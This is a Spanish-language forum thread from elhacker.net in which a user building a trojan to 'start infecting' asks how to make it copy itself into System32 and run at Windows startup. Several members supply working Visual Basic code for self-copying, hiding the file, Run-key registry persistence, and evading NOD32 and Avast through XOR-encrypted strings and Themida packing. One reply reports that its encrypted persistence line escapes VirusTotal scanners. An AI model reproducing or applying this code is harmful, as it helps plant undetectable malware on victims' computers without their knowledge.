Foro de elhacker.net

Programación => Programación Visual Basic => Mensaje iniciado por: vivachapas en 1 Mayo 2007, 20:15 pm


Título: copiar a system o system 32
Publicado por: vivachapas en 1 Mayo 2007, 20:15 pm
bueno... habiendo terminado un troyano... esta vez mas elaborado aunque con muy poquitas funciones... :S queria ya empezar a infectar... pero para eso necesito q cuando se ejecute el server se copie a alguna carpeta donde no lo enceuntren facil... como system o system32 y q se ejecute con windows....

alguno sabe como hacerlo?? desde ya muchas gracias

Título: Re: copiar a system o system 32
Publicado por: Jareth en 1 Mayo 2007, 20:31 pm
Vamos,no te vamos a dar todo hecho,algo tan sencillo como añadirse a run y copiarse a system...busca un poco antes de postear.
Ahora no tngo nada de tiempo,siento no poner code,pero esta en el foro.
Saludos.

Título: Re: copiar a system o system 32
Publicado por: vivachapas en 2 Mayo 2007, 00:49 am
bueno segui buscando y encontre la funcino para hacer q se ejecute con windows... la dejo aqui por si a alguien le hace falta:

usamos:
txtClave
txtExe
LabelInfo

Citar
Private mReg As cQueryReg
Private Const cvRun As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"

Dim s As String
'
s = mReg.GetRegString(cvRun, txtClave.Text)
If s <> "" Then
    LabelInfo.Caption = "La clave ya estaba asignada." & vbCrLf & s
Else
    If mReg.SetReg(cvRun, txtClave.Text, txtExe.Text) = ERROR_NONE Then
        LabelInfo.Caption = "La clave se ha asignado correctamente."
    Else
        LabelInfo.Caption = "ERROR al crear la clave."
    End If
End If

no lo probe al codigo espero q ande... jeje


no encontre como hacer a q se copie a system... me dijeron q era algo con clon pero nada
por favor si alguno seria tan amable de acercarme el codigo o algun link se lo agradeceria mucho  ;)

les dejo el link de donde saque la info
http://www.elguille.info/VB/utilidades/ExeEnCurrentVersionRun.htm (http://www.elguille.info/VB/utilidades/ExeEnCurrentVersionRun.htm)

Título: Re: copiar a system o system 32
Publicado por: vivachapas en 2 Mayo 2007, 00:59 am
lo tengoooooo XD


http://foro.elhacker.net/index.php/topic,151715.0.html (http://foro.elhacker.net/index.php/topic,151715.0.html)

para aquel q lo quiera ahi ta el link

Título: Re: copiar a system o system 32
Publicado por: vivachapas en 2 Mayo 2007, 01:37 am
Código:
s = mReg.GetRegString(cvRun, txtClave.Text)

no entiendo q tengo q poner en el txtClave??

Título: Re: copiar a system o system 32
Publicado por: Jareth en 2 Mayo 2007, 18:08 pm
Código:
dim clave as object    
set clave=CreateObject("WScript.shell")
clave.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Trojan" ,"c:\windows\system32\" & "Troyano.exe"     
y para copiarse:
Código:
Filecopy APP.apth & "\" & APP.exename & ".exe" ,"C:\WINDOWS\System32\troyano.exe" 
Bueno ahi lo tienes.
Saludos.

Título: Re: copiar a system o system 32
Publicado por: vivachapas en 2 Mayo 2007, 19:03 pm
muchas gracias..! ya lo pruebo  ;)

Título: Re: copiar a system o system 32
Publicado por: Hendrix en 2 Mayo 2007, 21:35 pm
Es un error bastante comun presuponer que el windows esta instalado en el disco C:\....para asegurarte, utiliza la api GetSystemDirectory que te va a dar como resutlado:

Citar
<HD>:\<carpeta de Windows>\System32

Otra cosa que puedes hacer es ocultarlo a la vista del usuario, es decir, dejando el archivo como archivo oculto, con el comando SetAttr (http://msdn2.microsoft.com/en-us/library/a5wx7516(VS.80).aspx)

Tambien te recomiendo que si vas a usar VBS para añadirte al registro, encriptes las cadenas para evitar la heuristica de ciertos antivirus (Por ejemplo el Nod32).

Un Saludo.


Título: Re: copiar a system o system 32
Publicado por: BenRu en 2 Mayo 2007, 21:47 pm
Citar
Es un error bastante comun presuponer que el windows esta instalado en el disco C:\....para asegurarte, utiliza la api GetSystemDirectory

En un modulo:

Código:
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long


Formulario:

Código:
Private Sub Form_Load()
    Dim Car As String * 128
    Dim Longitud, Es As Integer
    Dim Camino As String
    Dim win
    Dim sys
    
    Longitud = 128
    
    Es = GetWindowsDirectory(Car, Longitud)
    Camino = RTrim$(LCase$(Left$(Car, Es)))
    win = Camino
    
    Es = GetSystemDirectory(Car, Longitud)
    Camino = RTrim$(LCase$(Left$(Car, Es)))
    sys = Camino
End Sub

Un saludo  ;)

Título: Re: copiar a system o system 32
Publicado por: vivachapas en 2 Mayo 2007, 21:55 pm
Citar
Tambien te recomiendo que si vas a usar VBS para añadirte al registro, encriptes las cadenas para evitar la heuristica de ciertos antivirus (Por ejemplo el Nod32).

me podrias decir como lo cifro las cadenas??


Código:
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

si yo quiero guardarlo solo en system32 necesito esta api solamente... o la otra tb??

Título: Re: copiar a system o system 32
Publicado por: Hendrix en 2 Mayo 2007, 22:06 pm
Para lo de encriptacion de cadenas te dejo algo:

http://www.google.es/search?hl=es&client=firefox-a&rls=org.mozilla%3Aes-ES%3Aofficial&hs=rQf&q=cifrar+cadenas+VB&btnG=B%C3%BAsqueda&meta=

http://foro.elhacker.net/index.php?topic=156434.0;prev_next=next

Citar
si yo quiero guardarlo solo en system32 necesito esta api solamente... o la otra tb??

Benru te a dado todo el codigo que necesitas.... :) :) Te lo recopilo un poquito:

En un modulo:

Código:
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

En el formulario:

Código:
Dim system32 As String
Dim windows As String

Public Function RutaSystem32()
Dim Car As String * 128
Dim Longitud, Es As Integer
Dim Camino As String
    
Longitud = 128
    
Es = GetSystemDirectory(Car, Longitud)
Camino = RTrim$(LCase$(Left$(Car, Es)))
system32 = Camino
End Function

Public Function RutaWindows()
Dim Car As String * 128
Dim Longitud, Es As Integer
Dim Camino As String
    
Longitud = 128
    
Es = GetSystemDirectory(Car, Longitud)
Camino = RTrim$(LCase$(Left$(Car, Es)))
windows = Camino
End Function

Private Sub Form_Load()

RutaSystem32

MsgBox system32
End Sub

Un Saludo.


Título: Re: copiar a system o system 32
Publicado por: BenRu en 2 Mayo 2007, 22:07 pm
Citar
si yo quiero guardarlo solo en system32 necesito esta api solamente... o la otra tb??

No, no es necesaria. Pero recuerda que tendras que modificar el codigo, quedaria asi:
Código:
Private Sub Form_Load()

    Dim Car As String * 128
    Dim Longitud, Es As Integer
    Dim Camino As String
    Dim sys
    
    Longitud = 128
    
    Es = GetSystemDirectory(Car, Longitud)
    Camino = RTrim$(LCase$(Left$(Car, Es)))
    sys = Camino
End Sub

Saludos

Título: Re: copiar a system o system 32
Publicado por: vivachapas en 2 Mayo 2007, 22:18 pm
ok miren... lo de copiar a System32 tengo esto:

y funciana ;)

Modulo1
Código:
Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Public Function System32() As String
    Dim buf As String
    Dim ret As Long
    buf = String$(260, Chr$(0))
    ret = GetSystemDirectory(buf, Len(buf))
    System32 = Left$(buf, ret)
End Function

Form
Código:
Private Sub Form_Load()
On Error GoTo Fallo
FileCopy App.Path & "\" & App.EXEName & ".exe", System32 & "\prueba.exe"
Fallo:
End Sub

hasta ahi anda barbaro... no salta el antivirus ni nada... ahora en el form le agregue para q se ejecute y quedo asi:

form
Código:
Dim clave As Object

Private Sub Form_Load()
On Error GoTo Error
Set clave = CreateObject("WScript.shell")
clave.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Klass", System32 & "\prueba.exe"
Error:
On Error GoTo Fallo
FileCopy App.Path & "\" & App.EXEName & ".exe", System32 & "\prueba.exe"
Fallo:
End Sub

y si... es como dice Hendrix. me lo detecta el AV.. ahora leo esos manuales... y despues dejo el code final aqui por si alguien lo necesita ;)


para ser sincero no entendi lo de cifrar... es como sustituir la direccion por una variable???

Título: Re: copiar a system o system 32
Publicado por: vivachapas en 2 Mayo 2007, 23:28 pm
lo logreeeee bueno...

bueno les cuento lo puse como esta en el codigo anterior... y le pase el themida... y por lo menos el NOD32 no lo detecta...
pasa q me quedo re pesado ahora...

si me pudieran explicar bien como cifrar las cadenas xq no lo termine de enteder se los agradeceria muchisimo...


IGUALMENTE MUCHAS GRACIAS A TODOS!

toy feliz de este logro ;)

Título: Re: copiar a system o system 32
Publicado por: Novlucker en 2 Mayo 2007, 23:33 pm
Le pasaste el AV sin comprimir con Themida?? O ya te lo detectaba??

El Themida incrementa mucho el tamaño de un archivo, intenta conseguir un troyano indetectable sin necesidad de recurrir a esto ultimo

salu2

Título: Re: copiar a system o system 32
Publicado por: vivachapas en 2 Mayo 2007, 23:36 pm
cuando compilaba el exe saltaba el AV :(

ahora q le pase el themida no lo detecta... pero es mas lento... por ejemplo para mandar los screenshot tarda un monton y eso q tienen resolucion baja (20)

Título: Re: copiar a system o system 32
Publicado por: vivachapas en 3 Mayo 2007, 22:26 pm
ninguno me puede explicar bien como cifro las cadenas??

porfa... tengo el server q pesa muchisimo y mucho mas lento

Título: Re: copiar a system o system 32
Publicado por: Hendrix en 3 Mayo 2007, 23:37 pm
Ya te lo dije, tienes que buscar alguna funcion que encripte una cadena de texto, luego buscas la que lo desencripte, abres un proyecto nuevo en VB, pones la funcion encriptadora y ahces que aparezca el resutlado del texto encritpado en el textbox, lo copias y lo pones en la funcion que quieres ejecutar, pasandole la funcion desencriptadora....algo asi:

Código:
Kill "C:\archivo.exe"

Encritpas esto: C:\Archivo.exe

te queda asi: hgd5b5td4b

luego, pones esto:

Código:
kill funciondesencriptadora("hgd5b5td4b")

lo que hace esto es pasarle al comando kill, el argumento ya desencritpado, es decir, C:\archivo.exe

Un Saludo.


Título: Re: copiar a system o system 32
Publicado por: vivachapas en 4 Mayo 2007, 00:16 am
ahora entendi!! disculpen mi ignoracia!! XD

entonces lo q yo tengo q cifrar sera esto:

Código:
Clave.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Klass", System32 & "\klass.exe"

y me quedaria algo asi:

Código:
Clave.regwrite funciondesencriptadora("djflsdflkasdf")

Título: Re: copiar a system o system 32
Publicado por: vivachapas en 4 Mayo 2007, 02:47 am
huyyy... q hago mal!!... por favor les pido q miren este codigo q hice:


poner un text1   y en el text1.text = "####$$&&***%/***"
lo q es igual a "agus" una vez desencripado
Código:
Dim Des As String

Function descifrar(Ruta As String)
Ruta = Replace(Ruta, "####", "a")
Ruta = Replace(Ruta, "###$", "b")
Ruta = Replace(Ruta, "##$$", "c")
Ruta = Replace(Ruta, "#$$$", "d")
Ruta = Replace(Ruta, "$$$$", "e")
Ruta = Replace(Ruta, "$$$&", "f")
Ruta = Replace(Ruta, "$$&&", "g")
Ruta = Replace(Ruta, "$&&&", "h")
Ruta = Replace(Ruta, "&&&&", "i")
Ruta = Replace(Ruta, "&&&@", "j")
Ruta = Replace(Ruta, "&&@@", "k")
Ruta = Replace(Ruta, "&@@@", "l")
Ruta = Replace(Ruta, "@@@@", "m")
Ruta = Replace(Ruta, "@@@/", "n")
Ruta = Replace(Ruta, "@@//", "ñ")
Ruta = Replace(Ruta, "@///", "o")
Ruta = Replace(Ruta, "////", "p")
Ruta = Replace(Ruta, "///*", "q")
Ruta = Replace(Ruta, "//**", "r")
Ruta = Replace(Ruta, "/***", "s")
Ruta = Replace(Ruta, "****", "t")
Ruta = Replace(Ruta, "***%", "u")
Ruta = Replace(Ruta, "**%%", "v")
Ruta = Replace(Ruta, "*%%%", "w")
Ruta = Replace(Ruta, "%%%%", "x")
Ruta = Replace(Ruta, "%%%¬", "y")
Ruta = Replace(Ruta, "%%¬¬", "z")
Ruta = Replace(Ruta, "%¬¬¬", "0")
Ruta = Replace(Ruta, "¬¬¬¬", "1")
Ruta = Replace(Ruta, "¬¬¬<", "2")
Ruta = Replace(Ruta, "¬¬<<", "3")
Ruta = Replace(Ruta, "¬<<<", "4")
Ruta = Replace(Ruta, "<<<<", "5")
Ruta = Replace(Ruta, "<<<~", "6")
Ruta = Replace(Ruta, "<<~~", "7")
Ruta = Replace(Ruta, "<~~~", "8")
Ruta = Replace(Ruta, "~~~~", "9")
Ruta = Replace(Ruta, "~~~>", "A")
Ruta = Replace(Ruta, "~~>>", "B")
Ruta = Replace(Ruta, "~>>>", "C")
Ruta = Replace(Ruta, ">>>>", "D")
Ruta = Replace(Ruta, ">>>Ç", "E")
Ruta = Replace(Ruta, ">>ÇÇ", "F")
Ruta = Replace(Ruta, ">ÇÇÇ", "G")
Ruta = Replace(Ruta, "ÇÇÇÇ", "H")
Ruta = Replace(Ruta, "ÇÇǨ", "I")
Ruta = Replace(Ruta, "ÇǨ¨", "J")
Ruta = Replace(Ruta, "Ǩ¨¨", "K")
Ruta = Replace(Ruta, "¨¨¨¨", "L")
Ruta = Replace(Ruta, "¨¨¨^", "M")
Ruta = Replace(Ruta, "¨¨^^", "N")
Ruta = Replace(Ruta, "¨^^^", "Ñ")
Ruta = Replace(Ruta, "^^^^", "O")
Ruta = Replace(Ruta, "^^^[", "P")
Ruta = Replace(Ruta, "^^[[", "Q")
Ruta = Replace(Ruta, "^[[[", "R")
Ruta = Replace(Ruta, "[[[[", "S")
Ruta = Replace(Ruta, "[[[]", "T")
Ruta = Replace(Ruta, "[]]]", "U")
Ruta = Replace(Ruta, "]]]]", "V")
Ruta = Replace(Ruta, "]]]{", "W")
Ruta = Replace(Ruta, "]]{{", "X")
Ruta = Replace(Ruta, "]{{{", "Y")
Ruta = Replace(Ruta, "{{{{", "Z")
Ruta = Replace(Ruta, "{{{}", "á")
Ruta = Replace(Ruta, "{{}}", "é")
Ruta = Replace(Ruta, "{}}}", "í")
Ruta = Replace(Ruta, "}}}}", "ó")
Ruta = Replace(Ruta, "}}}\", "ú")
Ruta = Replace(Ruta, "}}\\", "Á")
Ruta = Replace(Ruta, "}\\\", "É")
Ruta = Replace(Ruta, "\\\\", "Í")
Ruta = Replace(Ruta, "\\\ð", "Ó")
Ruta = Replace(Ruta, "\\ðð", "Ú")
Ruta = Replace(Ruta, "\ððð", "ü")
Ruta = Replace(Ruta, "ðððð", "Ü")
End Function

Private Sub Command1_Click()
Des = descifrar(Text1.Text)
Text1.Text = Des
End Sub

ahora si prueban el codigo cuando le hacen click al boton... el text1 se borra y no deja ningun resultado... q hago mal?

Título: Re: copiar a system o system 32
Publicado por: Hendrix en 4 Mayo 2007, 14:49 pm
Mira, te paso una fucnion mucho mas simple que eso, aki tienes:

Código:
Public Function crypt(j)
On Error Resume Next
For R = 1 To Len(j)
crypt = crypt & Chr(Asc(Mid(j, R, 1)) Xor 7)
Next
End Function

Esta funcion cifra y descifra a la vez, ya que usa Xor.

Un Saludo.  ;)

Título: Re: copiar a system o system 32
Publicado por: ~~ en 4 Mayo 2007, 15:05 pm
Para obtener la ruta de windows y de system32, mejor q andar usando la api es usar environ, por ej:

Código:
msgbox environ("WINDIR")
msgbox environ ("SYSTEMDIR")

La de system32 creo q era asi, q no me apetece provar  :xD :xD

Hay mas llamadas como HOMEDRIVE para el disco C (comunmente claro ;)) o TMP para los temporales, tb hay otra para archivos de programa pero no me acuerdo ahora..

1S4ludo

Título: Re: copiar a system o system 32
Publicado por: Hendrix en 4 Mayo 2007, 17:23 pm
Para la carpeta System32 no hay ninguna (que yo sepa), la otra que te da la carpeta de windows es %Systemroot%.

Temporales --> tmp
Archivos de programa --> Programfiles

Si quieres ver todas esas variables, ve a la consola, escribe set y pulsa enter....

Un Saludo.  ;)


Título: Re: copiar a system o system 32
Publicado por: ~~ en 4 Mayo 2007, 18:02 pm
Da igual una q otra mira:

Código:
Private Sub Command1_Click()
MsgBox Environ("WINDIR")
MsgBox Environ("SYSTEMROOT")
End Sub

Título: Re: copiar a system o system 32
Publicado por: Hendrix en 4 Mayo 2007, 19:28 pm
Ya lo se, tu habia puesto systemdir, que es incorrecto... ;) ;)

Un Saludo.

Título: Re: copiar a system o system 32
Publicado por: vivachapas en 4 Mayo 2007, 19:38 pm
bien! al fin me anda el foro1 jeje hace horas q trato reponder...

Citar
Private Sub Command1_Click()
MsgBox Environ("WINDIR")
MsgBox Environ("SYSTEMROOT")
End Sub

gracias EON por ese code... seguro lo uso en otro troyano para ahorrarme un modulo...


y hendrix.. en seguida pruebo esa funcion ;)
pero me podrias decir q hice mal en la q invente... ademas de q es complicada... me mata no poder hacer algo bien XD

Título: Re: copiar a system o system 32
Publicado por: Hendrix en 4 Mayo 2007, 20:18 pm
Te e arreglado la tuya:

Código:
Dim Des As String

Public Function descifrar(Ruta As String) As String
Ruta = Replace(Ruta, "####", "a")
Ruta = Replace(Ruta, "###$", "b")
Ruta = Replace(Ruta, "##$$", "c")
Ruta = Replace(Ruta, "#$$$", "d")
Ruta = Replace(Ruta, "$$$$", "e")
Ruta = Replace(Ruta, "$$$&", "f")
Ruta = Replace(Ruta, "$$&&", "g")
Ruta = Replace(Ruta, "$&&&", "h")
Ruta = Replace(Ruta, "&&&&", "i")
Ruta = Replace(Ruta, "&&&@", "j")
Ruta = Replace(Ruta, "&&@@", "k")
Ruta = Replace(Ruta, "&@@@", "l")
Ruta = Replace(Ruta, "@@@@", "m")
Ruta = Replace(Ruta, "@@@/", "n")
Ruta = Replace(Ruta, "@@//", "ñ")
Ruta = Replace(Ruta, "@///", "o")
Ruta = Replace(Ruta, "////", "p")
Ruta = Replace(Ruta, "///*", "q")
Ruta = Replace(Ruta, "//**", "r")
Ruta = Replace(Ruta, "/***", "s")
Ruta = Replace(Ruta, "****", "t")
Ruta = Replace(Ruta, "***%", "u")
Ruta = Replace(Ruta, "**%%", "v")
Ruta = Replace(Ruta, "*%%%", "w")
Ruta = Replace(Ruta, "%%%%", "x")
Ruta = Replace(Ruta, "%%%¬", "y")
Ruta = Replace(Ruta, "%%¬¬", "z")
Ruta = Replace(Ruta, "%¬¬¬", "0")
Ruta = Replace(Ruta, "¬¬¬¬", "1")
Ruta = Replace(Ruta, "¬¬¬<", "2")
Ruta = Replace(Ruta, "¬¬<<", "3")
Ruta = Replace(Ruta, "¬<<<", "4")
Ruta = Replace(Ruta, "<<<<", "5")
Ruta = Replace(Ruta, "<<<~", "6")
Ruta = Replace(Ruta, "<<~~", "7")
Ruta = Replace(Ruta, "<~~~", "8")
Ruta = Replace(Ruta, "~~~~", "9")
Ruta = Replace(Ruta, "~~~>", "A")
Ruta = Replace(Ruta, "~~>>", "B")
Ruta = Replace(Ruta, "~>>>", "C")
Ruta = Replace(Ruta, ">>>>", "D")
Ruta = Replace(Ruta, ">>>Ç", "E")
Ruta = Replace(Ruta, ">>ÇÇ", "F")
Ruta = Replace(Ruta, ">ÇÇÇ", "G")
Ruta = Replace(Ruta, "ÇÇÇÇ", "H")
Ruta = Replace(Ruta, "ÇÇǨ", "I")
Ruta = Replace(Ruta, "ÇǨ¨", "J")
Ruta = Replace(Ruta, "Ǩ¨¨", "K")
Ruta = Replace(Ruta, "¨¨¨¨", "L")
Ruta = Replace(Ruta, "¨¨¨^", "M")
Ruta = Replace(Ruta, "¨¨^^", "N")
Ruta = Replace(Ruta, "¨^^^", "Ñ")
Ruta = Replace(Ruta, "^^^^", "O")
Ruta = Replace(Ruta, "^^^[", "P")
Ruta = Replace(Ruta, "^^[[", "Q")
Ruta = Replace(Ruta, "^[[[", "R")
Ruta = Replace(Ruta, "[[[[", "S")
Ruta = Replace(Ruta, "[[[]", "T")
Ruta = Replace(Ruta, "[]]]", "U")
Ruta = Replace(Ruta, "]]]]", "V")
Ruta = Replace(Ruta, "]]]{", "W")
Ruta = Replace(Ruta, "]]{{", "X")
Ruta = Replace(Ruta, "]{{{", "Y")
Ruta = Replace(Ruta, "{{{{", "Z")
Ruta = Replace(Ruta, "{{{}", "á")
Ruta = Replace(Ruta, "{{}}", "é")
Ruta = Replace(Ruta, "{}}}", "í")
Ruta = Replace(Ruta, "}}}}", "ó")
Ruta = Replace(Ruta, "}}}\", "ú")
Ruta = Replace(Ruta, "}}\\", "Á")
Ruta = Replace(Ruta, "}\\\", "É")
Ruta = Replace(Ruta, "\\\\", "Í")
Ruta = Replace(Ruta, "\\\ð", "Ó")
Ruta = Replace(Ruta, "\\ðð", "Ú")
Ruta = Replace(Ruta, "\ððð", "ü")
Ruta = Replace(Ruta, "ðððð", "Ü")
descifrar = Ruta
End Function

Private Sub Command1_Click()
Des = descifrar("####$$&&***%/***")
MsgBox Des
End Sub

Eran errores muy basicos, conviene que te leas mas sobre VB antes de empezar a hacer segun que proyectos... :-\ :-\

Un Saludo.


Título: Re: copiar a system o system 32
Publicado por: vivachapas en 5 Mayo 2007, 00:43 am
gracias! me funciono re bien... perdon xq tarde en responder pero no me entraba el foro...

probe el server y lo sigue detectando... :( dice q intenta crear un archivo *.exe
creo q debe ser cuando se copia a system32
se puede cifrar esto?? como??

le dejo el code:

Código:
FileCopy App.Path & "\" & App.EXEName & ".exe", System32 & "\klass.exe"
Ruta = System32 & "\klass.exe"

el modulo es el q postie al principio



perodonen por tantas preguntas es q es la primera vez q hago esta parte de ltroyano... simpre hacia uno le pasaba el themida y solamente funcionaba hasta q apagaban la compu o lo borraban XD

Título: Re: copiar a system o system 32
Publicado por: vivachapas en 8 Mayo 2007, 00:06 am
PROBLEMA SOLUCIONADO EL DE ABAJO! DESPUES DE MODIFICARLO MILES DE VECES ME DI CUENTA Q ME FALTABAN DOS " XD

no me anda :@ no se xq ya probe miles de formas y codigos... porfavor diganme q hago mal... :S


Código:
Dim Clave As Object
Dim WINDOWS As String

Private Sub Form_Load()
WINDOWS = Environ(windir)
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\jeje.exe"
Set Clave = CreateObject("WScript.shell")
Clave.regwrite descifrar("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[%'!'%mbmb%+'%D=[mbmb)bb")
End Sub

Private Function descifrar(j)
On Error Resume Next
For r = 1 To Len(j)
descifrar = descifrar & Chr(Asc(Mid(j, r, 1)) Xor 7)
Next
End Function

eso se copia y se graba en el registro... pero cuando compilo el programa dice:

Error '5' en tiempo de ejecucion:
Llamada a procedimiento o argumentos no válidos


q es?? no entiendo... el codigo creo q esta bien... hice lo q Hendrix me dijo  :huh:


bueno modifique el codigo cientos de veces... probe con nuevos proyectos... de todo... y creo q el error esta aca... pero no se como solucionarlo

Código:
Dim WINDOWS As String

Código:
WINDOWS = Environ(windir)

Título: Re: copiar a system o system 32
Publicado por: vivachapas en 8 Mayo 2007, 04:27 am
ahora me da error '450'
numero de argumentos erroneos o asignacion de propiedad no valida


esto me pone de mal humor.... :S


Código:
Dim WINDOWS As String
Dim Clave As Object

Private Sub Form_Load()
WINDOWS = Environ("windir")
Set Clave = CreateObject("WScript.shell")
Clave.regwrite descifrar("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[%'!'%wurbef%+'%D=[mbmb)bb")
End Sub

Private Function descifrar(j)
On Error Resume Next
For r = 1 To Len(j)
descifrar = descifrar & Chr(Asc(Mid(j, r, 1)) Xor 7)
Next
End Function

veran q todos los code son distintos ya q voy probando cambiando... haciendo nuevos proyectos -.-
bueno espero q alguien detecte el error por favor... esto ya me estallevando muchisimo tiempo

Título: Re: copiar a system o system 32
Publicado por: c4st0r en 25 Mayo 2007, 05:22 am
Bueno el error esta en el regwrite, de esta manera ya no es detectado por los AV por lo menos los del virustotal

Código:
Clave.regwrite descifrar("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[") & "Klass", descifrar("d=[pnichpt[t~tsbj45[") & "Klass.exe"

Título: Re: copiar a system o system 32
Publicado por: vivachapas en 25 Mayo 2007, 19:06 pm
si ya lo habia solucionado

muchas gracias de todos modos;)

igualmente el Avast me lo detecta  :-\
a lo mejor es otra parte del code pero no creo ya q es todo hecho por mi... pero bueno... ya voy a probar como dijeron q el otro tema... cambiando las variables, las ordenes etc


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines